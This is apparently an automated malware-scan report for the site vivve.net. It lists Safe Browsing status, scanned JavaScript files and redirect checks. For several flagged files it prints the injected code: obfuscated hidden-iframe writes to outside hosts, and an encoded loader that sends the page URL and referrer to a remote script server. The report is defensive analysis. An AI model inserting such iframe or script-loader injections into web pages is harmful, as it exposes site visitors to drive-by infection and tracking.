Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vivve.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://vivve.net/ | 200 OK Content-Length: 43149 Content-Type: text/html | clean |
http://vivve.net/media/system/js/caption.js | 200 OK Content-Length: 3742 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.write('<iframe src="'+'ht'+'tp://'+'infir'+'mi'+'e'+'re.'+'be/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://vivve.net/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 13840 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var UNDEF="undefined",OBJECT="object",SHOCKWAVE_FLASH="Shockwave Flash",SHOCKWAVE_FLASH_AX="ShockwaveFlash.ShockwaveFlash",FLASH_MIME_TYPE="application/x-shockwave-flash",EXPRESS_INSTALL_ID="SWFObjectExprInst",win=window,doc=document,nav=navigator,domLoadFnArr=[],regObjArr=[],timer=null,storedAltContent=null,storedAltContentId=null,isDomLoaded=false,isExpressInstallActive=false;var ua=function(){var w3cdom=typeof doc.getElementById!=UNDEF&&typeof doc.getElementsB Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = docu I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescape(_escape)); Antivirus reports:
| ||
http://vivve.net/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 3945 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof (allvideos)=="undefined"){var allvideos=new Object();allvideos.APIs=new Array()}function getUpdate(D,C,B,A){if(A=="null"){return }allvideos.APIs.each(function(E){if(E._pid==A){E._plCB(D,C,B)}})}allvideos.API=function(B){var A=null;allvideos.APIs.each(function(C){if(C._pid==B){A=C}});if(A!=null){return A}this._pid=B;this._player=null;this._item=null;this._load=null;this._width=null;this._height=null;this._state=null;this._elapsed=null;this._remaining=null;this._volume=null;this._plCB=fu Antivirus reports:
| ||
http://vivve.net/media/widgetkit/js/jquery.js | 200 OK Content-Length: 93052 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.jQuery||function(o,l){function ra(a,b,d){if(d===l&&a.nodeType===1)if(d="data-"+b.replace(cb,"-$1").toLowerCase(),d=a.getAttribute(d),typeof d==="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null"?null:!c.isNaN(d)?parseFloat(d):db.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=l;return d}function ca(a){for(var b in a)if(b!=="toJSON")return!1;return!0}function sa(a,b,d){var e=b+"defer",f=b+"queue",g=b+"mark",h=c.data(a,e,l,!0);h&&(d==="queue"||!c.data(a,f,l,!0)) Antivirus reports:
| ||
http://vivve.net/cache/widgetkit/widgetkit-10f4eb7b.js | 200 OK Content-Length: 15283 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window["WIDGETKIT_URL"]="/media/widgetkit"; (function(f){f.widgetkit={lazyloaders:{}}})(jQuery);(function(f,e,a){function c(a,b){n(a,function(a){return!b(a)})}function b(a,b){var c=e.createElement("script"),g=l;c.onload=c.onerror=c[m]=function(){if(!(c[k]&&!/^c|loade/.test(c[k])||g))c.onload=c[m]=null,g=1,i[a]=2,b()};c.async=1;c.src=a;d.insertBefore(c,d.firstChild)}var d=e.getElementsByTagName("head")[0],g={},h={},i={},l=!1,k="readyState",m="onreadystatechange",n=function(a,c){for(va Antivirus reports:
| ||
http://vivve.net/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 9679 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(!window.Silverlight)window.Silverlight={};Silverlight._silverlightCount=0;Silverlight.ua=null;Silverlight.available=false;Silverlight.fwlinkRoot="http://go.microsoft.com/fwlink/?LinkID=";Silverlight.detectUserAgent=function(){var a=window.navigator.userAgent;Silverlight.ua={OS:"Unsupported",Browser:"Unsupported"};if(a.indexOf("Windows NT")>=0)Silverlight.ua.OS="Windows";else if(a.indexOf("PPC Mac OS X")>=0)Silverlight.ua.OS="MacPPC";else if(a.indexOf("Intel Mac OS X")>=0)Silverlight. Antivirus reports:
| ||
http://vivve.net/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 18062 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jeroenwijering=="undefined"){var jeroenwijering=new Object();jeroenwijering.utils=new Object()}jeroenwijering.Player=function(B,C,A){this.configuration={backgroundcolor:"ffffff",file:"video.wmv",height:"260",image:"",backcolor:"FFFFFF",frontcolor:"000000",lightcolor:"000000",screencolor:"000000",width:"320",logo:"",overstretch:"false",showicons:"true",shownavigation:"true",showstop:"false",showdigits:"true",usefullscreen:"true",usemute:"false",autostart:"false",bufferlength:"3",duratio Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = docu I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescape(_escape)); Antivirus reports:
| ||
http://vivve.net/components/com_jcalpro/lib/shajax.js | 200 OK Content-Length: 12528 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof(shajax)=="undefined"){var shajax=new Object();} shajax.enabled=true;shajax.useCache=true;shajax.useCompression=false;shajax.enableDebug=false;shajax.enablePrefetch=true;shajax.maxCacheSize=400000;shajax.shajaxLiveSiteUrl='';shajax.shajaxProgressImage='';shajax.defaultProgressElement='shajaxProgress';shajax.shajaxUrlMap=new Array();shajax.toPrefetch=new Array();shajax.delayToPrefetch=400;shajax.addDOMLoadEvent=(function(){var load_events=[],load_timer,script,done,exec,o Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = docu I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescape(_escape)); Antivirus reports:
| ||
http://vivve.net/components/com_jcalpro/themes/default/template.js | 200 OK Content-Length: 7628 Content-Type: application/x-javascript | clean |
http://vivve.net/templates/vivve1/warp/js/warp.js | 200 OK Content-Length: 7267 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(f){f.fn.matchHeight=function(e){var a=0,c=[];this.each(function(){var a=e?f(this).find(e+":first"):f(this);c.push(a);a.css("min-height","")});this.each(function(){a=Math.max(a,f(this).outerHeight())});return this.each(function(b){var d=f(this),b=c[b],d=b.height()+(a-d.outerHeight());b.css("min-height",d+"px")})};f.fn.matchWidth=function(e){return this.each(function(){var a=f(this),c=a.children(e),b=0;c.width(function(d,e){return d<c.length-1?(b+=e,e):a.width()-b})})};f.fn.smoothScro Antivirus reports:
| ||
http://vivve.net/templates/vivve1/warp/js/accordionmenu.js | 200 OK Content-Length: 3112 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){var a=function(){};d.extend(a.prototype,{name:"accordionMenu",options:{mode:"default",display:null,collapseall:false,toggler:"span.level1.parent",content:"ul.level2"},initialize:function(a,b){var b=d.extend({},this.options,b),c=a.find(b.toggler);c.each(function(h){var a=d(this),c=a.next(b.content).wrap("<div>").parent();c.data("height",c.height());a.hasClass("active")||h==b.display?c.show():c.hide().css("height",0);a.bind("click",function(){f(h)})});var f=function(a){var a=d(c Antivirus reports:
| ||
http://vivve.net/templates/vivve1/warp/js/dropdownmenu.js | 200 OK Content-Length: 7007 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b){var e=function(){};b.extend(e.prototype,{name:"dropdownMenu",options:{mode:"default",itemSelector:"li",firstLevelSelector:"li.level1",dropdownSelector:"ul",duration:600,remainTime:800,remainClass:"remain",matchHeight:true,transition:"easeOutExpo",withopacity:true,centerDropdown:false,reverseAnimation:false,fixWidth:false,fancy:null},initialize:function(e,j){this.options=b.extend({},this.options,j);var a=this,g=null,q=false;this.menu=e;this.dropdowns=[];this.options.withopacity=b.bro Antivirus reports:
| ||
http://vivve.net/templates/vivve1/js/template.js | 200 OK Content-Length: 2769 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ $(document).bind('ready', function() { $('.menu-sidebar').accordionMenu({ mode:'slide' }); $('#menu').dropdownMenu({ mode: 'slide', dropdownSelector: 'div.dropdown'}); $('a[href="#page"]').smoothScroller({ duration: 500 }); $('.grid-block').matchWidth('.grid-h'); var matchHeight = function(){ $('#top-a .grid-h').matchHeight('.deepest'); $('#top-b .grid-h').matchHeight('.deepest'); $('#bottom-a .grid-h').matchHeight(' document.write('<iframe src="'+'ht'+'tp://'+'infir'+'mi'+'e'+'re.'+'be/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://vivve.net/templates/vivve1/warp/js/search.js | 200 OK Content-Length: 5666 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){var e=function(){};d.extend(e.prototype,{name:"search",options:{url:document.location.href,param:"search",method:"post",minLength:3,delay:300,match:":not(li.skip)",skipClass:"skip",loadingClass:"loading",filledClass:"filled",resultClass:"result",resultsHeaderClass:"results-header",moreResultsClass:"more-results",noResultsClass:"no-results",listClass:"results",hoverClass:"selected",msgResultsHeader:"Search Results",msgMoreResults:"More Results",msgNoResults:"No results found"},initia Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vivve.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 01 Oct 2014 17:52:44 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 01 Oct 2014 17:52:47 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: X-Mapping-alncmkhk=45E3ECE5D67C4E27EABAB69D03233598; path=/
Set-Cookie: ad0c340601528403731b20183ddb57fd=orb2e4c4je6rs4ksie78isr6e4; path=/
GET / HTTP/1.1
Host: vivve.net
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 01 Oct 2014 17:52:44 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 01 Oct 2014 17:52:47 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: X-Mapping-alncmkhk=45E3ECE5D67C4E27EABAB69D03233598; path=/
Set-Cookie: ad0c340601528403731b20183ddb57fd=orb2e4c4je6rs4ksie78isr6e4; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: vivve.net
Referer: http://www.google.com/search?q=vivve.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vivve.net
Referer: http://www.google.com/search?q=vivve.net
Result:
The result is similar to the first query. There are no suspicious redirects found.